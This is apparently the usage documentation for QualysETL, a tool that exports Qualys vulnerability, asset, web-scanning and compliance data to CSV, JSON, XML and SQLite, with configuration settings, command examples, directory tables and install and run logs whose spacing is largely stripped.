UsageCreate XML, JSON, CSV and SQLite3 Database Formats of Qualys data.ETL ConfigurationConfiguration file: /opt/qetl/users/[quser]/qetl_home/config/etld_config_settings.yamlEnsure you set these configurations:host_list_detection_concurrency_limit: 2Set this to appropriate qualys concurrency limit value after\nreviewing theQualys Limits Guidehttps://www.qualys.com/docs/qualys-api-limits.pdfwith your TAM for Questions.(qetl_venv)qualysetl@ubuntu:~/.local/bin$more/opt/qetl/users/qualysetl/qetl_home/config/etld_config_settings.yaml## This file is generated by qetl_manage_user only on first invocation.# File generated by qetl_manage_user on: 2023-08-09 07:33:00## YAML File of available configuration options for Qualys API Calls and future options.# Ensure you set these configurations:## 1) host_list_detection_concurrency_limit: 2# - Set this to appropriate qualys concurrency limit value after reviewing the# [Qualys Limits Guide] https://www.qualys.com/docs/qualys-api-limits.pdf with your TAM for Questions.# Note: if you exceed the endpoints concurrency limit,# the application will reset the concurrency limit to X-ConcurrencyLimit-Limit - 1## kb_last_modified_after: 'default' # Leave at default. 
Knowledgebase is auto-incremental
# to full knowledgebase.
# kb_export_dir: 'default'                          # Leave at default until future use is developed.
# kb_payload_option: 'default'                      # Leave at default until future use is developed.
# kb_distribution_csv_flag: True                    # True/False Populates qetl_home/data/knowledgebase_distribution_dir
#
# host_list_vm_processed_after: 'default'           # Leave at default until future use is developed.
# host_list_payload_option: 'default'               # Leave at default until future use is developed.
# host_list_export_dir: 'default'                   # Leave at default until future use is developed.
# host_list_distribution_csv_flag: True             # True/False Populates qetl_home/data/host_list_distribution_dir
#
# host_list_detection_payload_option: 'default'     # Leave at default until future use is developed.
# host_list_detection_export_dir: 'default'         # Leave at default until future use is developed.
# host_list_detection_vm_processed_after: 'default' # Leave at default until future use is developed.
# host_list_detection_concurrency_limit: 2          # Reset based on your subscription api concurrency limits
# host_list_detection_multi_proc_batch_size: 500    # Leave at 500
# host_list_detection_distribution_csv_flag: True   # True/False Populates qetl_home/data/host_list_detection_distribution_dir
#
# asset_inventory_payload_option: 'default'         # Leave at 'default' until future use is developed.
# asset_inventory_export_dir: 'default'             # Leave at 'default' until future use is developed.
# asset_inventory_asset_last_updated: 'default'     # Leave at 'default' until future use is developed.
# asset_inventory_distribution_csv_flag: True       # True/False Populates qetl_home/data/asset_inventory_distribution_dir
#
# requests_module_tls_verify_status: True           # Recommend leaving at True to protect application against
#                                                    # man-in-middle attacks. False will set Python3 requests module
#                                                    # verify option to False and requests will accept any TLS
#                                                    # certificate presented by the server, and will ignore hostname
#                                                    # mismatches and/or expired certificates, which will make your
#                                                    # application vulnerable to man-in-the-middle (MitM) attacks.
#                                                    # This option is useful for development testing only when you
#                                                    # are behind a reverse proxy, ex. Data Loss Prevention solution,
#                                                    # and you haven't installed the trusted certificates yet.
# was_distribution_csv_flag: True                    # True/False Populates qetl_home/data/was_distribution_dir

requests_module_tls_verify_status: True

kb_last_modified_after: 'default'
kb_export_dir: 'default'
kb_payload_option: 'default'
kb_distribution_csv_flag: True

host_list_vm_processed_after: 'default'
host_list_export_dir: 'default'
host_list_distribution_csv_flag: True

host_list_detection_payload_option: 'default'
host_list_detection_export_dir: 'default'
host_list_detection_vm_processed_after: 'default'
host_list_detection_concurrency_limit: 8
host_list_detection_multi_proc_batch_size: 500
host_list_detection_distribution_csv_flag: True

asset_inventory_payload_option: 'default'
asset_inventory_export_dir: 'default'
asset_inventory_asset_last_updated: 'default'
asset_inventory_distribution_csv_flag: True

was_distribution_csv_flag: True
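Because the file is plain YAML, it can also be checked programmatically before starting a large run. A minimal sketch, not part of QualysETL itself, assuming PyYAML (which is installed in the qetl_venv shown later in this document) and the example user path used in the ETL examples below:
# Minimal sketch: read a user's etld_config_settings.yaml and print a few of the
# documented keys before kicking off a large ETL run. The path is an example.
import yaml   # PyYAML is included in the qetl_venv

config_file = '/opt/qetl/users/quser/qetl_home/config/etld_config_settings.yaml'
with open(config_file, encoding='utf-8') as f:
    settings = yaml.safe_load(f)

for key in ('host_list_detection_concurrency_limit',
            'host_list_detection_multi_proc_batch_size',
            'requests_module_tls_verify_status',
            'host_list_detection_distribution_csv_flag'):
    print(key, settings.get(key))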
ETL Examples
ETL KnowledgeBase
KnowledgeBase ETL - Incremental update to the Knowledgebase. CSV, JSON and SQLite are the full knowledgebase; XML is incremental. Note: the knowledgebase will rebuild itself every 30-90 days to ensure gdbm is reorganized.
qetl_manage_user -u /opt/qetl/users/quser -e etl_knowledgebase
ETL Host List
Host List ETL - Download Host List based on date. If no date is used, Host List will auto-increment from the last run ( max LAST_VULN_SCAN_DATETIME ); if no sqlite database exists, it will start an incremental pull from UTC minus 1 day.
qetl_manage_user -u /opt/qetl/users/quser -e etl_host_list -d [YYYY-MM-DDThh:mm:ssZ]
See Application Manager and Data for the location of your qetl_home directory.
ETL Host List Detection
Host List Detection ETL - Includes KnowledgeBase and Host List, so do not run ETL Host List or ETL KnowledgeBase while Host List Detection ETL is running. If no date is used, the Host List driver will auto-increment from the last run ( max LAST_VULN_SCAN_DATETIME ); if no sqlite database exists, it will start an incremental pull from UTC minus 1 day.
qetl_manage_user -u /opt/qetl/users/quser -e etl_host_list_detection -d [YYYY-MM-DDThh:mm:ssZ]
ETL Asset Inventory
Asset Inventory (GAV/CSAM API) ETL - Includes CyberSecurity Asset Inventory API (CSAM) or its subset Global Asset View API (GAV). If no date is used, the Asset Inventory will be pulled from UTC minus one day.
qetl_manage_user -u /opt/qetl/users/quser -e etl_asset_inventory -d [YYYY-MM-DDThh:mm:ssZ]
ETL Web Application Scanning Data
Web Application Scanning (WAS API) ETL - Includes Web Applications, Web Application Findings and the Web Application Catalog.
qetl_manage_user -u /opt/qetl/users/quser -e etl_was -d [YYYY-MM-DDThh:mm:ssZ]
ETL Policy Compliance PCRS
Policy Compliance (PCRS API) ETL - Includes Policy, Host, and Posture Information for your host assets.
qetl_manage_user -u /opt/qetl/users/quser -e etl_pcrs -d [YYYY-MM-DDThh:mm:ssZ]
ETL Test System
Test System ETL - Small system test to validate that the modules are all working. log/test_system.log will contain all results.
Executes Programs:
etl_knowledgebase - brings the knowledgebase up to date.
etl_host_list ( 75 hosts )
etl_host_list_detection ( 75 hosts )
etl_asset_inventory ( 900 hosts )
etl_was ( subset of applications )
etl_pcrs ( subset of applications )
qetl_manage_user -u /opt/qetl/users/quser -e etl_test_system
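These commands can also be wrapped for unattended or scheduled execution. A minimal sketch, not part of QualysETL itself; the paths and user directory are examples, and the pipe-delimited log format it parses is described in the Logging section below:
# Minimal sketch: run one ETL job through the venv's qetl_manage_user, then scan
# its pipe-delimited log for ERROR/WARNING entries. Paths are examples; adjust them.
import subprocess

qetl_manage_user = '/opt/qetl/qetl_venv/bin/qetl_manage_user'
user_home = '/opt/qetl/users/quser'

subprocess.run([qetl_manage_user, '-u', user_home, '-e', 'etl_knowledgebase'], check=True)

# The second pipe-delimited field of each log line is the logging level.
problems = []
with open(f'{user_home}/qetl_home/log/kb.log', encoding='utf-8') as log_file:
    for line in log_file:
        fields = [field.strip() for field in line.split('|')]
        if len(fields) > 1 and fields[1] in ('ERROR', 'WARNING'):
            problems.append(line.rstrip())

print(len(problems), 'ERROR/WARNING entries found in kb.log')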
Application Manager and Data
qetl_manage_user application
qetl_manage_user is your entry point to manage ETL of Qualys data.
Host List Detection SQLite Database
qetl_manage_user -u [userdir] -e etl_host_list_detection -d [datetime] - Resulting sqlite database ready for distribution.
Environment
Python virtual environment managed by qetl_manage_user.
Example options for qetl Home Directories:
Prod: /opt/qetl/users/[user_name]/qetl_home
Test: /usr/local/test/opt/qetl/users/[user_name]/qetl_home
Dev: $HOME/opt/qetl/users/[user_name]/qetl_home
Application Directories
Path | Description
---- | -----------
opt/qetl/users/ | Directory of All Users
opt/qetl/users/[user]/qetl_home | Parent directory path for a user
[user]/qetl_home | User Home Directory
qetl_home/bin | User bin directory for customer to host scripts they create.
qetl_home/cred | Credentials Directory
qetl_home/cred/.etld_lib_credentials.yaml | Credentials file in yaml format.
qetl_home/cred/.qualys_cookie | Cookie file used for Qualys session management.
qetl_home/config | Application Options Configuration Directory
qetl_home/config/etld_lib_config_settings.yaml | Application Options
qetl_home/log | Logs - Directory of all run logs
qetl_home/log/kb.log | LOG - KnowledgeBase Run Logs
qetl_home/log/host_list.log | LOG - Host List Run Logs
qetl_home/log/host_list_detection.log | LOG - Host List Detection Run Logs
qetl_home/log/asset_inventory.log | LOG - GAV/CSAM Asset Inventory Run Logs
qetl_home/log/was.log | LOG - Web Application Scanning (WAS) Run Logs
qetl_home/log/pcrs.log | LOG - PCRS API Run Logs
qetl_home/data | Application Data - Directory containing all csv, xml, json, sqlite database data.
qetl_home/data/kb_sqlite.db | Database - Cumulative Knowledgebase SQLite Database
qetl_home/data/host_list_sqlite.db | Database - vm_last_processed Host List SQLite Database
qetl_home/data/host_list_detection_sqlite.db | Database - vm_last_processed Host List Detection SQLite Database
qetl_home/data/asset_inventory_sqlite.db | Database - lastScanDate Asset Inventory SQLite Database
qetl_home/data/was_sqlite.db | Database - WebApp lastScan.date SQLite Database
qetl_home/data/pcrs_sqlite.db | Database - PCRS SQLite Database
qetl_home/data/knowledgebase_extract_dir | Extract - latest *.json.gz, *.xml.gz files
qetl_home/data/host_list_extract_dir | Extract - latest *.json.gz, *.xml.gz files
qetl_home/data/host_list_detection_extract_dir | Extract - vm_last_processed Host List Detection XML Data Dir
qetl_home/data/asset_inventory_extract_dir | Extract - Asset Inventory Extracts of last scan date of asset in JSON Format.
qetl_home/data/was_extract_dir | Extract - Web Application Scanning (WAS) JSON Data Dir
qetl_home/data/pcrs_extract_dir | Extract - PCRS JSON Data Dir
qetl_home/data/knowledgebase_distribution_dir | Distribution - latest *.csv.gz files if option set in etld_config.settings.yaml
qetl_home/data/host_list_distribution_dir | Distribution - latest *.csv.gz files if option set in etld_config.settings.yaml
qetl_home/data/host_list_detection_distribution_dir | Distribution - latest *.csv.gz files if option set in etld_config.settings.yaml
qetl_home/data/asset_inventory_distribution_dir | Distribution - latest *.csv.gz files if option set in etld_config.settings.yaml
qetl_home/data/was_distribution_dir | Distribution - latest *.csv.gz files if option set in etld_config.settings.yaml
qetl_home/data/pcrs_distribution_dir | Distribution - latest *.csv.gz files if option set in etld_config.settings.yaml
Data Formats
Data Formats created in qetl_home/data:
Format | Description
------ | -----------
JSON | JavaScript Object Notation, useful for transfer of data between systems
CSV | Comma Separated Values, useful for transfer of data between systems. Formatted to help import data into various BI or Database Tools: Excel, Apache Open Office, Libre Office, Tableau, Microsoft PowerBI, SQL Database Loader
XML | Extensible Markup Language, useful for transfer of data between systems
SQLite Database | SQLite Database populated with Qualys data. Useful as a self-contained SQL Database of Qualys data for Analysis. Useful as an intermediary transformation into your overall Enterprise ETL Process. SQLite is an in-process library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine
Logging
Logging fields are pipe delimited with some formatting for raw readability. You can easily import this data into excel, a database for analysis, or link this data to a monitoring system.
Format Description
YYYY-MM-DD hh:mm:ss,ms - UTC Date and Time. UTC is used to match internal date and time within Qualys data.
Logging Level - INFO, ERROR, WARNING, etc.
Logging levels can be used for troubleshooting or remote monitoring for ERROR/WARNING log entries.Module Name: YYYYMMDDHHMMSSTop Level qetl Application Module Name that is executing, along with date to uniquely identify all log entries associated with that job.User NameOperating System User executing this application.Function Nameqetl Application Function Executing.Messageqetl Application Messages describing actions, providing data.SeeApplication Directoriesfor details of each log file.cdqetl_home/log\nhead-3kb.log(qetl_venv)qualysetl@ubuntu:/opt/qetl/qetl_venv/bin$cat/opt/qetl/users/qualys_user/qetl_home/log/kb.log|nl12021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|LOGGINGSUCCESSFULLYSETUPFORSTREAMING22021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|PROGRAM:['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase']32021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|check_python_version|Pythonversionfoundis:['3.8.5 (default, Jan 27 2021, 15:41:15) ','[GCC 9.3.0]']42021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|get_sqlite_version|SQLiteversionfoundis:3.31.1.52021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|parentqetlcodedir-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packagesApplication MonitoringTo monitor the application for issues, the logging format includes a logging level.Monitoring for ERROR will help identify issues and tend to the overall health of the applicaiton operation.Securing Your Application in the Data CenterFollow your corporate procedures for securing your application. A key recommendation is to use a password vault\nor remote invocation method that passes the credentials at run time so the password isn't stored on the system.Password VaultQualysETL provides options to inject credentials at runtime via qetl_manage_user, so your credentials are not stored on disk.qetl_manage_user options to inject credentials at runtime are:-p, --prompt-credentials prompt user for credentials, also accepts stdin with credentials piped to program.-m, --memory-credentials get credentials from environment: q_username, q_password, q_api_fqdn_server-s, --stdin-credentials send credentials in json to stdin.\nExample:\n{\"q_username\": \"your userid\", \"q_password\": \"your password\", \"q_api_fqdn_server\": \"api fqdn\", \"q_gateway_fqdn_server\": \"gateway api fqdn\"}Qualys recommends customers move to a password vault of their choosing to operate this applications credentials.\nBy creating functions to obtain credentials from your corporations password vault, you can improve\nthe security of your application by separating the password from the machine, injecting the credentials at runtime.One way customers can do this is through a work load management solution, where the external work load management\nsystem ( Ex. Autosys ) schedules jobs injecting the required credentials to QualysETL application at runtime. This eliminates\nthe need to store credentials locally on your system.If you are unfamiliar with password vaults, here is one example from Hashicorp.Hashicorp Products VaultHashicorp Getting StartedExample Run LogsUninstall Run LogMake sure you are not in your Python Virtual Environment when running uninstall.Notice the command prompt does not include (qetl_env). 
That means you have deactivated the Python3 Virtual Environment(qetl_venv)qualysetl@ubuntu:~$deactivate\n\nqualysetl@ubuntu:~/.local/bin$python3-mpipuninstallqualysetl\nFoundexistinginstallation:qualysetl0.6.30\nUninstallingqualysetl-0.6.30:Wouldremove:/home/dgregory/.local/bin/qetl_setup_python_venv/home/dgregory/.local/lib/python3.8/site-packages/qualys_etl/*/home/dgregory/.local/lib/python3.8/site-packages/qualysetl-0.6.30.dist-info/*\nProceed(y/n)?ySuccessfullyuninstalledqualysetl-0.6.30\nqualysetl@ubuntu:~/.local/bin$Install Run LogMake sure you are not in your Python Virtual Environment when installing this software.Notice the command prompt does not include (qetl_env).(qetl_env)qualysetl@ubuntu:~$deactivate\nqualysetl@ubuntu:~$python3-mpipinstallqualysetl\nCollectingqualysetlDownloadingqualysetl-0.6.30-py3-none-any.whl(79kB)|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588|79kB1.8MB/sInstallingcollectedpackages:qualysetl\nSuccessfullyinstalledqualysetl-0.6.30\nqualysetl@ubuntu:~$qetl_setup_python_env Run Logqualysetl@ubuntu:~/.local/bin$./qetl_setup_python_venv/opt/qetl\nStartqetl_setup_python_venv-FriJan2107:07:22PST20221)test_os_for_required_commands2)test_for_pip_connectivity3)prepare_opt_qetl_env_dirsusage:qetl_setup_python_venv[/opt/qetl][test|prod][versionnumber]qetl_setup_python_venv[-h]forhelpdescription:Createapython3virtualenvironmentandinstallthequalysetlapplicationintothatenvironmentforusage.Thisisolatesthequalysetlapplicationdependenciestothepython3virtualenvironment.Seehttps://pypi.org/project/qualysetl/forfirsttimesetupandinstallationinstructions.options:qetl_setup_python_venv[/opt/qetl][test|prod][versionnumber]1)[/opt/qetl]-rootdirectorywhereapplicationanddatawillbestored.-Youmustberoottocreatethisdirectory.-Seehttps://pypi.org/project/qualysetl/forfirsttimesetup/installationinstructions.2)[test|prod]-obtainQualysETLfromtestorprodpypiinstance.3)[versionnumber]-obtainversionnumberofqualysetl.examples:1)qetl_setup_python_venv/opt/qetl-Ensureyouhave/opt/qetldirectorycreatedbeforerunningthisprogram.-CreatesQualysETLEnvironment.Seedirectoryinformationbelow.2)qetl_setup_python_venv/opt/qetlprod0.6.131-willinstallversion0.6.131ofqualysetlfrompypi.orgintoyour/opt/qetl/qetl_venvdirectory.3)qetl_setup_python_venv/opt/qetltest0.6.131-willinstallversion0.6.131ofqualysetlfromtest.pypi.orgintoyour/opt/qetl/qetl_venvdirectory.directoryinformation:/opt/qetl-rootdirectoryforApplicationandData/opt/qetl/qetl_venv-applicationdirectoryforQualysETLPythonVirtualEnvironment/opt/qetl/users-datadirectorycontainingresultsofQualysETLexecution.files:Seehttps://dg-cafe.github.io/qualysetl/#application-manager-and-datacontainernotes:1)Forcontainerdeployment,exdocker,applicationanddataareseparatedforcontainerdeployment.ContainerApplication-/opt/qetl/qetl_venvshouldinstalledintothecontainerimage.PersistentData-/opt/qetl/usersshouldbemappedtotheunderlyinghostsystemforpersistentstorageofapplicationdata.\n\n\nCreateqetlPythonEnvironment?/opt/qetl/qetl_venvprod:latest\nDoyouwanttocreateyourpython3virtualenvironmentforqetl?(yesorno)yes\n\nok,creatingpython3virtual/opt/qetl/qetl_venv4)create_qetl_python_venv-willrunforabout1-2minutes1PackageVersion2------------------------3boto31.17.974botocore1.20.975certifi2021.5.306chardet4.0.07idna2.108jmespath0.10.09oschmod0.3.1210pip20.0.211pkg-resources0.0.012python-dateutil2.8.113PyYAML5.4.114qualysetl0.6.3515requests2.25.
116s3transfer0.4.217setuptools57.0.018six1.16.019urllib31.26.520wheel0.36.221xmltodict0.12.01Name:qualysetl2Version:0.6.353Summary:QualysAPIBestPracticesSeries-ETLBlueprintExampleCodewithinPythonVirtualEnvironment4Home-page:https://dg-cafe.github.io/qualysetl/5Author:DavidGregory6Author-email:dgregory@qualys.com,dave@davidgregory.com7License:Apache8Location:/opt/qetl/qetl_venv/lib/python3.8/site-packages9Requires:10Required-by:Success!Yourpythonvirtualenvironmentforqetlis:/opt/qetl/qetl_venvYourpython3venvseparatesyourbasepythoninstallationfromtheqetlpythonrequirementsandisyourentrytoexecutingtheqetl_manage_userapplication.Yourbaseqetlinstallationhasmovedtoyourpythonvirtualenvironment:/opt/qetl/qetl_venv!!!savethesecommandsastheyareyourentrytoruntheqetlapplication1)source/opt/qetl/qetl_venv/bin/activate2)/opt/qetl/qetl_venv/bin/qetl_manage_user(Yourentrypointtooperatingqualysetl)Nextsteps:Enteryourpython3virtualenvironmentandbegintestingqualysconnectivity.1)source/opt/qetl/qetl_venv/bin/activate2)/opt/qetl/qetl_venv/bin/qetl_manage_user\n\nEndqetl_setup_python_venv-Thu17Jun202108:40:04PMPDT\nqualysetl@ubuntu:~/.local/bin$qetl_manage_userYou can execute qetl_manage_user to see options available. To operate the qetl_manage_user\napplication you'll first enter the python3 virtual environment, then execute qetl_manage_user.(qetl_venv)qualysetl@ubuntu:~/.local/bin$qetl_manage_userusage:qetl_manage_user[-h][-uqetl_USER_HOME_DIR][-eetl_[module]][-evalidate_etl_[module]][-c][-t][-i][-d][-r][-l]CommandtoExtract,TransformandLoadQualysdataintovariousforms(CSV,JSON,SQLITE3DATABASE)optionalarguments:-h,--helpshowthishelpmessageandexit-uHomeDirectoryPath,--qetl_user_home_dirHomedirectoryPathExample:-/opt/qetl/users/q_username-eetl_[module],--execute_etl_[module]executeetlofmodulename.validoptionsare:-eetl_knowledgebase-eetl_host_list-eetl_host_list_detection-eetl_asset_inventory-eetl_was-eetl_pcrs-eetl_test_system(forasmallsystemtestofallETLJobs)-evalidate_etl_[module],--validate_etl_[module][testlastrunofetl_[module]].validoptionsare:-evalidate_etl_knowledgebase-evalidate_etl_host_list-evalidate_etl_host_list_detection-evalidate_etl_asset_inventory-evalidate_etl_was-evalidate_etl_pcrs-evalidate_etl_test_system-dYYMMDDThh:mm:ssZ,--datetimeYYYY-MM-DDThh:mm:ssZUTC.GetAllDataOnorAfterDate.Ex.1970-01-01T00:00:00Zactsasflagtoobtainalldata.-c,--credentialsupdatequalysapiusercredentials:qualysusername,passwordorapi_fqdn_server-t,--testtestqualyscredentials-i,--initialize_userForautomation,createa/opt/qetl/users/[userhome]directorywithoutbeingprompted.-l,--logsdetailedlogssenttostdoutfortestingqualyscredentials-v,--versionHelpandQualysETLversioninformation.-r,--reportbriefreportoftheusersdirectorystructure.-p,--prompt-credentialspromptuserforcredentials,alsoacceptsstdinwithcredentialspipedtoprogram.-m,--memory-credentialsgetcredentialsfromenvironment:Example:q_username=\"your userid\",q_password=yourpassword,q_api_fqdn_server=apifqdn,q_gateway_fqdn_server=gatewayapifqdn-s,--stdin-credentialssendcredentialsinjsontostdin.Example:{\"q_username\":\"your userid\",\"q_password\":\"your password\",\"q_api_fqdn_server\":\"api fqdn\",\"q_gateway_fqdn_server\":\"gateway api fqdn\"}etld_config_settings.yamlnotes:1.ToEnableCSVDistribution,addthefollowingkeystoetld_config_settings.yamlandtoggleon/offthemviaTrueorFalsekb_distribution_csv_flag:True# populates qetl_home/data/knowledgebase_distribution_dirhost_list_distribution_csv_flag:True# populates 
qetl_home/data/host_list_distribution_dirhost_list_detection_distribution_csv_flag:True# populates qetl_home/data/host_list_detection_distribution_dirasset_inventory_distribution_csv_flag:True# populates qetl_home/data/asset_inventory_distribution_dirwas_distribution_csv_flag:True# populates qetl_home/data/was_distribution_dirThesefilesarepreparedfordatabaseload,testedwithmysql.Noheadersarepresent.ContactyourQualysTAMandscheduleacallwithDavidGregoryifyouneedassistancewiththisoption.qetl_manage_user Add UserTo add a new user, execute qetl_manage_user -u [opt/users/your_new_user]. See example run log below.qualysetl@ubuntu:~$source/opt/qetl/qetl_venv/bin/activate(qetl_venv)qualysetl@ubuntu:~$qetl_manage_userPleaseenter-u[your/opt/qetl/users/userhomedirectorypath]Note:/opt/qetl/users/newuseristherootdirectoryforyourqetluserhomedirectory,enteranewpathincludingtheopt/qetl/users/newuserinthepathyouhaveauthorizationtowriteto.theprefixtoyouruserdirectoryopt/qetl/usersisrequired.Example:1)/opt/qetl/users/newuserusage:qetl_manage_user[-h][-uQETL_USER_HOME_DIR][-eEXECUTE_ETL_MODULE][-dDATETIME][-c][-t][-l][-p][-s][-m][-r]CommandtoExtract,TransformandLoadQualysdataintovariousforms(CSV,JSON,SQLITE3DATABASE)optionalarguments:-h,--helpshowthishelpmessageandexit-uQETL_USER_HOME_DIR,--qetl_user_home_dirQETL_USER_HOME_DIRPleaseenter-uoption-eEXECUTE_ETL_MODULE,--execute_etl_moduleEXECUTE_ETL_MODULEExecuteetl_knowledgebase,etl_host_list,etl_host_list_detection,etl_asset_inventory,etl_was,etl_pcrs,etl_test_system-dDATETIME,--datetimeDATETIMEYYYY-MM-DDThh:mm:ssZUTC.GetAllDataOnorAfterDate.Ex.1970-01-01T00:00:00Zactsasflagtoobtainalldata.-c,--credentialsupdatequalysapiusercredentialsstoredondisk:qualysusername,passwordorapi_fqdn_server-t,--testtestqualyscredentials-l,--logsdetailedlogssenttostdoutfortestqualyscredentials-p,--prompt_credentialspromptuserforcredentials-s,--stdin_credentialsreadstdincredentialsjson{\"q_username\":\"your userid\",\"q_password\":\"your password\",\"q_api_fqdn_server\":\"api fqdn\",\"q_gateway_fqdn_server\":\"gateway api fqdn\"}-m,--memory_credentialsGetcredentialsfromenvironmentvariablesinmemory:q_username,q_password,q_api_fqdn_server,andoptionallyaddq_gateway_fqdn_server.Ex.exportq_username=myuser-r,--reportBriefreportoftheusersdirectorystructure.(qetl_venv)qualysetl@ubuntu:~$qetl_manage_user-u/opt/qetl/users/qqusr_dt4\n\nqetl_user_home_dirdoesnotexist:/opt/qetl/users/qqusr_dt4/qetl_home\nCreatenewqetl_user_home_dir?/opt/qetl/users/qqusr_dt4/qetl_home(yesorno):yes\n\nqetl_user_home_dircreated:/opt/qetl/users/qqusr_dt4/qetl_home\n\n\nCurrentusername:initialuserinconfig:/opt/qetl/users/qqusr_dt4/qetl_home/cred/.etld_cred.yaml\nUpdateQualysusername?(yesorno):yes\nEnternewQualysusername:qqusr_dt4\nCurrentapi_fqdn_server:qualysapi.qualys.com\nUpdateapi_fqdn_server?(yesorno):no\nUpdatepasswordforusername:qqusr_dt4\nUpdatepassword?(yesorno):yes\nEnteryourQualyspassword:\nYouhaveupdatedyourcredentials.QualysUsername:qqusr_dt4Qualysapi_fqdn_server:qualysapi.qualys.com\n\n\nWouldyouliketotestlogin/logoutofQualys?(yesorno):yes\n\nQualysLoginTestforqqusr_dt4atapi_fqdn_server:qualysapi.qualys.com\n\nTestingQualysLoginforqqusr_dt4Succeededatqualysapi.qualys.comwithHTTPSReturnCode:200.\n\nThankyou,exiting.(qetl_venv)qualysetl@ubuntu:~/opt/qetl/qetl_venv/bin$qetl_manage_user ETL 
KnowledgeBase(qetl_venv)qualysetl@ubuntu:~/opt/qetl/qetl_venv/bin$qetl_manage_user-u/opt/qetl/users/qualys_user-eetl_knowledgebase\nStartingetl_knowledgebase.Forprogressseeyour/opt/qetl/users/qualys_user/qetl_homelogdirectory\nEndetl_knowledgebase.Forprogressseeyour/opt/qetl/users/qualys_user/qetl_homelogdirectory(qetl_venv)qualysetl@ubuntu:~/opt/qetl/qetl_venv/bin$cat/opt/qetl/users/qualys_user/qetl_home/log/kb.log|nl12021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|LOGGINGSUCCESSFULLYSETUPFORSTREAMING22021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|PROGRAM:['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase: 20210528012603']32021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|check_python_version|Pythonversionfoundis:['3.8.5 (default, Jan 27 2021, 15:41:15) ','[GCC 9.3.0]']42021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|get_sqlite_version|SQLiteversionfoundis:3.31.1.52021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|parentqetlcodedir-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages62021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|childqetlcodedir-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl72021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_lib-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_lib82021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_templates-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_templates92021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_knowledgebase-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_knowledgebase102021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_host_list-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_host_list112021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|parentuserappdir-/opt/qetl/users/qualys_user122021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|userhomedirectory-/opt/qetl/users/qualys_user/qetl_home132021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_root_dir-Userrootdir-/opt/qetl/users142021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_home_dir-qualysuser-/opt/qetl/users/qualys_user/qetl_home152021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_data_dir-xml,json,csv,sqlite-/opt/qetl/users/qualys_user/qetl_home/data162021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_log_dir-logfiles-/opt/qetl/users/qualys_user/qetl_home/log172021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_config_dir-yamlconfiguration-/opt/qetl/users/qualys_user/qetl_home/config182021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_cred_dir-yamlcredentials-/opt/qetl/users/qualys_user/qetl_home/cred192021-05-2801:26:03,900|INFO|etl_knowledgebase:2021052
8012603|dgregory|setup_user_home_directories|qetl_user_bin_dir-etlscripts-/opt/qetl/users/qualys_user/qetl_home/bin202021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-kb_last_modified_after:default212021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-kb_export_dir:default222021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-host_list_vm_processed_after:default232021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-host_list_payload_option:notags242021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_kb_vars|knowledgeBaseconfig-/opt/qetl/users/qualys_user/qetl_home/config/etld_config_settings.yaml252021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_kb_vars|kb_export_dirisdirectfromyaml262021-05-2801: